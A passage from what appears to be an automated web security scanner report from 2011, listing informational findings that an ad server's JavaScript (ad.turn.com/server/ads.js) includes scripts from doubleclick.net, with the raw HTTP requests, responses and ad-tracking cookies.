tq1YsQUmG14zwsdGjNCmXvH89Ns8YMIodbd9oSQ80dokk7S5ul1zP6BLW5eswwD4eWnSvjM6YIyaPo076xrJcUOxLUO2TMPVjIrqDa0tm-KiBTwJ3Mz3nWcDL3eoMcRG7qSFM-Ia8iW6v4r--R4cQ0tOXuzZZM1HHBzHQCnHDFIT76c4pTy1x4tO_Sj_92V_c2h3ymUN4Kcfp_vUL9n2zWwMihkX8zucrcdwEbmMe-hvJRVE-2eJRtXuJuLGMKv73tIlgifHPMyMYOKyKgjFTLZMNQF2iyMUjVL7ttzR-BfUXXk1Trf8LJnbyKEXEXy4Rs5cySrnTOh9dMxUw7WE-jZwNXri7ovUdLf3Y0d2cR3Mo0lffrMYn7DG3CobkkduYq477_djhhS3SPkBUOiwXvO6Kt9mMt7SwQaRBfvCxoXpri-pvt5MhqWaQjjpMBxrbFAAi6qyCp8bWnTpeqxAQqD-Dto7E8GwAg5Pmqnod8-GD7k9QAhA1y9lElb1FxLMTYR8GJndpgqdetG7Gif1SgdcWuh9OwP5WPMPXscRpCIMi1HTwWt6KUDOBOeqTXHz5bMr71kjDg1X648oQCMr_-pcs6-yUjStQuln63OD6AXuthlJn1ar6k7JMNu1QAN0iG54DqOheKMDeziVqBn8GZyeZoSeZjxWwnMyW93qk8bfadK-MzpgjJo-jTvrGslxQ1Lf8W-KixpiMgaKLVnFYfdM2M4TlfE8-EAAJpHFMIjpod24YCXPiz88Q4FnH7hHkwC363daRWvDMQSggQ0XBJ3vpzilPLXHi079KP_3ZX9z_D3Pnxac4hOmSOizeoBAAmxcqNpbx_qyOHF8bx__m3LXXSqRzn2UVUm82kY9Q_bAWhV-NPCnkoMVp1trM0nzB0w1AXaLIxSNUvu23NH4F9Q13Du5h2ZYkpF0eVjjZLPxzlzJKudM6H10zFTDtYT6Nv7ck4hLa59nrUxBxfvK0jsTiDPqMR2OonD2-THiRk-erjvv92OGFLdI-QFQ6LBe8_DPa6OuqYk9OTYaaVjd1DGuL6m-3kyGpZpCOOkwHGtsbfcmG0fy54O8N3wai-WvMYQPGY_BRfLoJQ-fzCavlZTH05yYchy8iu18YHh3Yjeufsyc4tF_hYWieSe2zh_teVxa6H07A_lY8w9exxGkIgyJaaRHTrwpoz27fIZ1IYrP0_5bgJl8vrWh4S5IofNmvPz02zxgwih1t32hJDzR2iSFfqx4MhvTgtjM3lWSYPHVadK-MzpgjJo-jTvrGslxQ0RcVu8jaTaGeoRXAyPCre50Ap9gnzkFEVb7fs7kVfWDMqWV5CaT_WJtk2pUzRC4eg47W10Xto39Ckmzrya4h33vpzilPLXHi079KP_3ZX9zDr0_5RCzZyGIrZvmqD0qM4OT5YshiebyZ7gQJS9Y2G7nSV4NcuM8rWRbl8qnNncE-KnYHtDCpxbmzdYonZCReozEk2lFkYL78ePNoyJfDPFQx6yXCg7HucZPwYbGMGquQBLetBIomVzLxRoGxCnj9AuAQa0jxkQqiAZvgO5_1I0StRTQfNp_8TKujPl08Nio3VO03uwsDFLvsKFK97otf3P7Da31DnYEVo5TPgRz20GdnA6Cc72wg-FSafZjckluCDYSsbafBv55Fuk04mpOQ-8wTaZoi4WtPLy3Y3_RsAIb58ANfJNPw7PDUJnwvB5dd6Pj4inu1F6wbmUeqF8IzBEKDqi96IV8EJZ5BHYIe6k7CD2J70CjIpgjp325VAAQQdaIpbGH7ED3K8MO0N02HXED1_Q1nKKRzK6-Rem3ynzIZcssxMIxa11vVxs5mT5Uf91F7QAbAskQZLgankz_lEAtsWoRc15hRbwTJ6OpTIfeE9K-EkC4wSG3itwHytKKywH0jEuEtimvw01NpAdll_S12LxBxPSFr3AblTJ7QlhxOn7NpzXjHY_E5lvc4A6NuB7ghG0r9F5ryP8PbOUmNlPE47_4cVrSmIJL5HRi5olIbPfhz06rl7TrRbZu6TgoL4F9VUieGd2NNutj5j2Ykjk_oiZPJQNg7s-IVZj_8x19CUDvtIMl1s27WDYDzDWC_LSD_hITbj4n3NJ1VnSODES7HgOnosb-a6IAhKWZEUXaNYisGujMcHx0-V460jT0WaPFOl7r-G1YurokLRfo7nTkNuS-FBQ8_zqCnhKxdkov0SCCBSsA9JuQotNKJ3eme79-Yk8VnPY0NhpeTxKpkv2hrlh0-3r1iJk9NptV68epA5hgUytkmdmxxZLnHriOqlwIRUgsfIlB6JAryIf1QYW7ABDvcp7PlPgkJSWReqXTf7i8khFNnmzwH7l3uSRIJ9CaGKwVgQZWnfY1DwqN3RpkxZoDBSjtxesSm3Uug3sv9nwUirjHGXOnnQOyMp0rDIgHDbs1vRtyybpwPmOc5yMEuMrTMtlonH_O9JeRPOWP0ZIih2xqCfVz4XEoVm7IJ9GGhR58b-k1cysnOhgQ4XoPFs4VpT53jYjQ1BIgYtT_QesIMpas4UCL7cLQUCYEefF8ZhuDwI6vTYJUDfh7N4eviQPgiUdr4wy3HO5F-m_plXLm1QU_y8eE9lmQCYwznt4hvD-1jgLwfCa--WFUa_x_ig6W75jQfoKoJulCUXe_iyUTY0KihwMRsyHtwNg6X-lTVLUMvMaLLHAZy6qByVfshfmQXD3gCj1g9GfL5GWIfSL8ueQYsJ2aTgwcNjtxIY7OiRH46Py8__ZNIhhU37x5BD07goFgJXPSoi1qO3GYCyHDGFt0zB7oyV5Po_JUlyVJIDWF8ZE3Z5lVCujHjrE_-wqHnoWVM_QmHLTwkEB8etYNKKOHF_ktFST_LIiB; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:39 GMT; Path=/
Set-Cookie: fc=F2nbXY4wwxMQ2-he6VYeifaRRxFr5MeY29EQT3n5PvLWxCHnHcZ9c7H5tLCAyYGL9mvM8AxO6Wo9RZJIxm2oF2_ICtsxL0KUEYWMLSd-wG8Gn2BjtD6YgIvLsovsrQsM3UekJ-H8erl5fjZijTgySbhjzsJdH2qIqE1UGB4xWwFfA3hHwBPZ26rwLfEhGtco; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:39 GMT; Path=/
Set-Cookie: pf=8SLxkLbfsZjR0znsHi3neH4OSvybkQwzidj39osYezeS04H7stKnZdMqlx3yK2bU4q1C_4bU43_azC2tZTPOE5xKMUvxbd3f4Da9CFOTnTLWCQKR_r6qY54lFjJbA4MKo2PgnaN3rNEZPcj1JP_yFl3OnJaEawY-HzaiUFPHnzHCJURYTll9YSZFjFvcZECT7ANZN-zFyB3LaaiNSQAne-eUjAeuFexCQpSIGGE-hCu26aZc5sDc4UJmeMYA4wA4zO05pHI-TuL2Zs_aTFBxV5zGyX9gCVIJL41fXCewMtGIOTObyhw6XI9NsuIQ3LHMPwDuZeCTmjbOJ12_tYZY7qYaNMhlV9JYPNAa9WJ26feij1a04Z4aJbTbeEF7HREPS4iF2IFkJR-IDjmCPDngrg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:23:39 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:23:38 GMT
Content-Length: 10889


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
zGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4515.131803.TURN/B5378843.4;abr=!ie;sz=160x600;ord=4368933343399774953?;click=http://r.turn.com/r/tpclick/id/6Qq0bLqRoTxeyAkACAIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBD-aSeUC0TavtIsTQlQeV8KSSA8CshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGoKXIm7CXh8BG%26num%3D1%26sig%3DAGiWqtynzGyD5NOSB5w7sFpbILgCD5Jd-g%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...

24.35. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25615591&ahcid=781458&bimpd=0DJCOea7tQaPEXcsrHCGvbJ50l01mKSguUhbpQoeH0RWhqpfXKSPD0-MFPpVBPU10m7tT2_9tEc5CKS7Skz1aq9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BDkvQ6eUL3X8PfnSnaGsp-uk-XYrDlOOeRoBgVlRm5kMDlByLclETPpBR0VIG2dC6a9Q7FgriWjdrLAU7A9qPMdWscBjIiCiOms451jrCwDdtZPZ9Ju5iYKDVU3obChYLLzf464GptzhEx9p1rrX3KW3vX64t9pV4q8g0-D_Ww98PQ132Ppbuk7ijoUndfzz7rNfyLeQH5Gio5Do8v242vKJ6CYR718wQw9XuMOxHtEN8BBICX6F00yJ7PyUVTqmTQaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IRxgM2aC6JuWrx_7_5RQ2-cyT1LhRsTuEogXW-yxzh0vfOgMJJgzaqMcTcfaNoC7PX91mNtx9s8FQapZIbkQ1tO176w3mh_t7mVXDw8Rxd3gYR-TIJOv7LUxnRCA3B1881InA3TgJhUy39fsTN9KR4PAbDv3_uGCXV0Te9AyFL5Xt_T370WDWWY1SqEwEJwbhn-ZNI0MTk2TjTf5ElUcAOcWpSmQvUNv3Xnc2JdM3M-BA9y0FUzpqtDC0K6uSmpOagRBN5xins51mVi5acEHrzqo408BxR9uazB8jKSDnLvk&acp=TbRAMgAB9HgK5TqFIPdMcQuNKMEfW-AFpdRoCg&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjpxiMkC0TfjoB4X1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGsue0ifi5i601%26num%3D1%26sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676549&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658549115&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658549122&frm=1&adk=2614322350&ga_vid=574713569.1303658549&ga_sid=1303658549&ga_hid=1439411518&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=11
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=CMHOO7uf_udLLq9eGtJ3PdQJcQ_K22BQHXQ-dT6incxd6ISB_q_vS5rapRhLZ6kjvFBMD_r71JCvgjjawylbas-n3UVMoc2HfetiqdcGK7-MifLpV7fqak3Dns_efbQIZw0xnwcn-ju7SUW_27p2BuIIvMb-MRyDgs7z-nEGMqA; fc=NVeBshHSVnoUxhcixGrBhDuuhRKDd8vnh1xheKiYPKd3AL7Gx9Az1OHn7o3KNmBFGJEeoEGIaoMAXW2vTWlmm73wc-cQ7FRKnITKYzO3zYV52dhK4dSErN9-EcLOAtq0; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12; rds=15082%7C15082%7C15082%7C15088%7Cundefined%7C15082%7C15082%7Cundefined%7C15082%7C15082%7C15085%7C15085%7C15082%7C15085%7Cundefined%7C15085; rv=1; uid=2931142961646634775; pf=cKSJytWeDuTjEufRdCi4y8XcRCfZwFweqykUL2eo0UykdjY4nIpUBwhVZBThIPaF4B627JHWL3ahuj3A_UBrxpxKMUvxbd3f4Da9CFOTnTL5X3zgmC6OWXowKKoj5df4HRoJFl3mPlckn1wpclzDLQ7iVTPo6xLeW82rZAWcMMn-0ge5B6bX-Jw_BSdBMhaJRceopGJpc2YjAVLP6yBcU90N40phyJxywLIOGGEKSw8ZoVJuroHICj-FGi_cY7Rd52uo68R-HwHiqzs9rfgwUoBC0YF5sFftF8hFGep-tyiZF_0ohQEDeKLZrcUSOm6EjZzcmrNZG35Zw0ulgG_qswliy_Srlk4j3LntAATjDnn0h96ywTxXtonIC2ddFM5e

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Tue, 26 Apr 2011 15:30:18 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:18 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=ddlU3HId5MaLRyayOAxOv6e1S4EpOzHJ9jWjO40aLKXDlGIUOWYS4TNj-1gj_Xcu77DtXuOsguLFXai3AhFvnLgBIMRhB2UOyXU1gHDwAID4Gsu4bgzX3HPXF8aZ-svzaho3UCU7Y1WfW1yv2EPwU0ywBbEJ4wtzflynm2A6q-pe3Cch1FBWqUhRXCeYz4jCon4LrJIKvPFN49pNuuU11hu8NfeyA_rS3BgELcsMsmBueA6joXijA3s4lagZ_Bmcz63pE4ozprgEO3FrlKYcQWnSvjM6YIyaPo076xrJcUOWfPVDM4ewql4E0qnTePubkBNn_TRBrw78HyPdexCRUXmxHZfc4p6eOVS-LVkk2KfBLeu5dFGcYKXhSdYOkpNX76c4pTy1x4tO_Sj_92V_c-Zd5gzh76DvpSEIud5bTmzBxQDH60wp7kWI6OtXwmsK8lCKtjWb8L9cUWaU-0UIo60LYKVlDBRhtDudy0aLm_tMNQF2iyMUjVL7ttzR-BfUM-tp89GxY2BjWUXIKPrRCs5cySrnTOh9dMxUw7WE-jbFzWA_8HGnuPTv5gj8D-oTVbRheWFalCX1wFIJaPC0u6477_djhhS3SPkBUOiwXvN_WwtT_ZKGSyDgXfkChQ0Mri-pvt5MhqWaQjjpMBxrbOSPaoBe4rX2OGkF6B5R5CKJoFEcgByN-Oi_xplHijt7D7k9QAhA1y9lElb1FxLMTWJMROkp2Xp7-HrCQ6npmBdcWuh9OwP5WPMPXscRpCIM-AxjFwSedJsA9duBIIoEH137K3Xedhve5L8S-WPAK15cs6-yUjStQuln63OD6AXuV4KgDOLc_1A4zE1C7F6UsGnSvjM6YIyaPo076xrJcUMGbKH33Mk3AAwHXX6IbEZeikZt4xeL6nraPEnFmjJxqM5LKwaW7Iwkg187TjopMcM05BucZOqIftlq19PLBiS676c4pTy1x4tO_Sj_92V_c98DRRkWusVt-Rux-hx66uC8mSFRnxnBUrSsMeG95GDw110qkc59lFVJvNpGPUP2wGndfgx95uzctKDelIPRbDBMNQF2iyMUjVL7ttzR-BfUd8a7ZlLpYgNqlOs9AM3Pas5cySrnTOh9dMxUw7WE-jZvFyIY8t_idDXE26ZOboPiYr1Cgt3jCTxEf1c1hGpvTa477_djhhS3SPkBUOiwXvOwqcR0Ec-KDppc0eGaONjEri-pvt5MhqWaQjjpMBxrbNZUSW4tD2VUhTWhRWU0h3yuPGM9W_Y4f-0-7YcinRzAUojhpX01rVy9-nj4jsvWlPVnIv-we7WrGXA10RMH6AFcWuh9OwP5WPMPXscRpCIMEZoZABCtvE0HnT-mxDiVVlnZKM_XJqTgUu_ZQzKn9FupDjfslrVyDxMBDlIppEJH3Wi1pcsBzL-a3IKmDdYDffz02zxgwih1t32hJDzR2iRH1xuEqF5DOIMy4KaraXc7adK-MzpgjJo-jTvrGslxQ970lXXKY1IvTeRRmXa7ij15xA_rvxJf0kdWomdIMrfwedEtnsFAncF6xSZD-ONiaGH_1ig58l32p_YrzpHC_DrvpzilPLXHi079KP_3ZX9zUcbIjjByU9n3_IlHTjKXIyf2BXQhSGVENGxgKqnojxrKV1B7NBMN8fr3nrJxtWo72xCVN_41MyrkEhrGbQ_r-Ew1AXaLIxSNUvu23NH4F9Q62Hc-eW6IaqN1LFSpkN26zlzJKudM6H10zFTDtYT6NssphFVz66kVO4sp3KHcbJzHb5BhyxmUX3VNl7WMXnrrrjvv92OGFLdI-QFQ6LBe84v3KLBrKgbQQ7FReWo9zyyuL6m-3kyGpZpCOOkwHGts7zs5zEeOZSTUu3-RSAG5SAhkRuulSpIxjTvGPkA2QGYPuT1ACEDXL2USVvUXEsxNr8F_iZZnVI2kVI3kaWBhdFxa6H07A_lY8w9exxGkIgwYLyQMK_xFsleORqJ6nP1RSUtLeguGIQ9odHomQReXE1JI7eQCKlb1D2RYtn4wmX-cOUcpPIvbDh06dGTnPu7CadK-MzpgjJo-jTvrGslxQ5uijGSE3qRQ5wNhEnVbHUsml822lIAWZilIfMj6Aa8Xj_Fvokk54_adFqvZFXeehnrUStPhVFMnK3sDBoZU3ci4v7aFu6WfkCEg9-gVQX8Q4cSdQOKBWDUzbKd_9Z6_1Q9fvn94HXXFFPok0XXz_lzz4kt5Z4ia2sPQIkWnZc70irWdCeM-u-vI54qVTRBQSgPcqV6Y2man6FmyrIe5Yq-TqvOLmhyJxn_95-Z3_1f0os_XT4LxOAvjvzeN7-AvJe56C8TwxqQRU4R3ZrbbaD-UGdqEtI70aFECTjCE5M1RilPlTvOohWo6nJDCKG3NLslXLmghzpDDtZAAuF74GHqupiYokZznsRUuLKgJVpmKZbouowwqHVMmrEyBFPkY8X3rm--dL65XS9oD2kwF5AOt8qstgohAf8ZUw1D1bd0hv8H0_48uwloDar3VjCslKxWORKByLcOyWFuEsAe2T7nI2aXNVpj67HiV0yaf3n4yvaeDCsb0KMkiKlSIhakrDSnztT8TxEK13ftDkrrak9tgTd-MadqkV_axJjulFCKDhCRxPmiaHG8XFoMFm_wewNzuhbHHeUxaHro4szgRs37uCyoZITKUs1r9JYlv6dUvAJXRAzuGt4_jw78coUpWP58PJgAKavnV1Ygb_aaj3uY-7whp_-ROyqCTu6Bem7IXgSYUVOL8eo28jjDNUrcNUauU5ux4Gt2oPfkh1SDRYgW_XLqylK2d4Mdni_Zee_BQMdRgthGGjLNFp3amfCQ5eMmMaW6KCBl-lALT_MGQS_6_-PWR_SW78XvouyFnXeeM6r0BygLRSLmbavA5Ih1oW8c-uWP19ocHjFMTQfjJxT4VqvQRD2MjZ2CYHvt7ShoeY2Kw5gJ4aLfcH--1rolKvePqjVSkPQsGU-d9vircOa2PpsZdtkiGmY8NgneYDBpvMlW-2YD1cANQZ5LMJSYeyp5W8pEbptOSVLP-z2McYexTn-7cbFm16LJUek0qEPMvu9DSYlG7N88nGH10r_u4V6EHM7XQyrIy4rzELj2HG6f73qX2cIDJ4gXxcSuSEZ2myTF9MtXwQjBZVDa4dkktRJ0abRN4ws4ErRCFL6jlrbHJqGU2HeJmO12wiihOOyABUwiBdSfIgMXkKoJqtSHj1LTUyHw9O7jL6GqialHpVZokgbtIV4ZO_rZ-C2ODUjwlBOu9dMDlXQU7TROY6FCc6MV3aBHD3wx1jbv8LvlJBPcXj9Y7s1YGS3SpC544G8XddMzRCPSLp3o175Iyj1lFbficvYTx19Qjior_eFO3rn87WKVQ7-ogenoy7Nz-VrVT_Y6OIA5Ts8Ru5abzil7lMSnT53Afi4YX8MQXoe-GCi5uodkRKarLT-5SijtoC441ndds8jaU8E7R7D39tpDeIYXJNs2WUZbb7pI8v5jP_m_Rc-RI68juRhJ1zX0KehJ56-bo6wFb5xB9JY_rsiwKc3cndErscnjsM7BSCKSQADscB5pf_pmv63dP8tDYn9UuqznQ1y7yBIf3npwbG99OcCmtGRUWkCFL1X6ngzaPRjXXztnVNXzpC79DJiqJCgml; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:18 GMT; Path=/
Set-Cookie: fc=qLH_PVqTymH1HU4O_j837yBVlgP3udUMuQ9NtmsqfxEjJU3u7yxMXk5wO5uqxHVXBtGK3PyNbIqcqC0usuk15axdMLn-DYTOi7o-kwGyn3_w19ePaOrvUodFzixpDIBOch24Vt5IwJJXFqONK8WZCvpZT2r-ImqIbIee7QyEpWA; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:18 GMT; Path=/
Set-Cookie: pf=SwcPTr2OtibMWVIKij4VkiZ3K2Aynzk4QwM6HUQpclcIHKIn0aMUCJnjty0nF6sdbclOGXPRI-4VrzHDg2TW0E8SQn_UBe0B2PMF8GuoieLB8rw3HCsM6f9IpOSiQTFvJRKRbaQOui20s_9Bg4OdTngvxbAnhJ28PXFGVB1HyKBzy9fyoK7Wm9GhDtN3JSpoDSdgzvPz5efu6QjaGKhI5UwRUPHDfEOV3_7TnliI6U0x0lAZcaUvKKJ1QHmD_0YTw3USs_Efch8DyLQMqjj6C38-1lKIfX8YIpHRO4p--bGdMJBPDfs0jkNOV4KIC2xDdyNCEwJ23wuLt_MXDO1Z_IPhKl9BwPkNTah2lgQhjENI6H6e7r5GTuDHDKVwuDsSEg7X7QYS6UmUwbg2ikGtI0G3AaAZcVYD2Nt2uXf8ZtPeW6pgENIG8_w3xeZd6kK1sMs6I0SNDLzqnN7H1gbxbZdD0DY_lKb855iyP7fClP5XxONep4hNPzsxAJRJ1kou-ViOtsrp_bf27P9c5lUTyCQKcdzHjBck_b_B-UHMhYH6KLrjh5PX3m_XxZw53g56CxLowAXMELECGkbRM_oCpxhBhsTZW3iX4HdrzgpwAaQUck2p3bpVoUvhSSLXPCI9YtE-kyi_nTaX0IVqR-yakQI0mYYAhFFECfCHCg2SRYxq0S6M5I00QXLWYk2q3FJRFAkPpRwM27uiAj3Z4Fb61SVxTnK9m8UT7c0aPfZXb45oPleeGy8UXPpw6YYtnkYd_D_l2IAslLLyavszHjZBPa2iUWFiyom5hkFnxOuMWDkxYJXvwfLfmqZkXT0JHDrVc4TY00edyWQMXDx77_42FDNx_pd_cAxTF40mk5v5pYwWwImtJiseNAMcdxLAMVqLXSN0ML_WxcCtQ1Ci02yJaWGlL3V4Ng9ZefLRufU4NIErvMs-foQv1s-THrPJvkSFf_RbvZfjFZEbm5rhYFYobJEeNFTJ5qhmGU_V9TSYPraYX96uGtM_3pFVOdw-9XnKnQJPf1j2ATP8fxtG9wtsxg; Domain=.turn.com; Expires=Fri, 21-Oct-2011 15:30:18 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:30:18 GMT
Content-Length: 10867


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
OtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;" WIDTH=160 HEIGHT=600 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3285.turn/B2343920.7;abr=!ie;sz=160x600;ord=8440323269241723068?;click=http://r.turn.com/r/tpclick/id/vNidbEsNInVOlAsABwIBAA/3c/http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBjpxiMkC0TfjoB4X1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAmTAAgTIAuyT6QmoAwHoA7wB6AOUAvUDAAAAxIAGsue0ifi5i601%26num%3D1%26sig%3DAGiWqtwTOtDzQyQS0g4TnwrKdqolkBZqUg%26client%3Dca-pub-6888065668292638%26adurl%3D/url/;">\n</SCRIPT>
...[SNIP]...

24.36. http://ad.turn.com/server/ads.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /server/ads.js?pub=5622371&cch=5689307&code=5689677&l=160x600&aid=25622058&ahcid=787926&bimpd=ZgRAXFQYPQ72pSfK_PTQXwYv4sqzRgrPFWEPN0T11xiEIpxs2hJ8CaiUjHpmY1v-N23Q0O1bkk3X5KD3AvT7rK9niBJoz6621irB3f190hXQBbsq7GRkM0K-RGUzu2oktl1sL4zS-2XTqCiC_CemeNW-SvPVZ9uvWN6QKCcGWsGWw_XUAnRIc08sAhMi6jaM3UfbSMqNBzxuuOzvFqY6BAVsGcZaad0LohGRrY_PptpgOqkQGoDTJbJd7uwGGvhIlgHBzIj8H9loLjUdnhyPRbB5cdXFU4eUtt0Sd-buMq4iT9bDskPT3GYIORMjuNHSgU2xBm3QHaMdsIoCKhXuXzRgCD-gHnxGWovO3Pj6yB57QZSR55M9KtvER9_PB-eitC8cnfVoc-ffY0bjr9ypPula_qJLrXcrZr4baiYl_ymbdXBugl_YriUkFVc2JIJzcrbHBKfRsOA81Nd1u8is6AaJQmyFM1l4x-S8oOkTR0VUULXw7tpNDsCXeX5kiU7IMmAKf-fTCPDGWd8sW3YPeje31BMcyDn3elA9zU91mj8tpJsct7VH1G9-d_6KUMHbX91mNtx9s8FQapZIbkQ1tLXj2l4eq3bXsLRG2lgk3vFLdD31mqGRsMBpPXQG-h3S5RRYa-cfSyudFlPXwGJCEdWGFeOJW7Ysm02dNTuGUaDt_T370WDWWY1SqEwEJwbhx8Qd9AYEkrt9Ysl-GVyMgJyFabNKBnxQoIOFlgiYOrJA9y0FUzpqtDC0K6uSmpOa-_o7WETpsTIqibm6vBqblKo408BxR9uazB8jKSDnLvk&acp=TbROhQAEnBkK5TqFIPdMcXGIyEr_KizofF-fzw&3c=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB1Ut5hU60TZm4EoX1lAfxmN2HAsCshNABlKfb8wyIx7WKGQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAGM97n0A7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9iLnBocD9zZWFyY2g9JTdCJGtleXdhNmQ0YpgCZMACBMgC7JPpCagDAegDvAHoA5QC9QMAAADEgAaBvY_1rt6P2yo%26num%3D1%26sig%3DAGiWqtzaFmwsDVNDneUP-J0S8ckVGnH7aw%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680216&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662216231&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662216243&frm=1&adk=2614322350&ga_vid=1201236310.1303662216&ga_sid=1303662216&ga_hid=2010158345&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=14
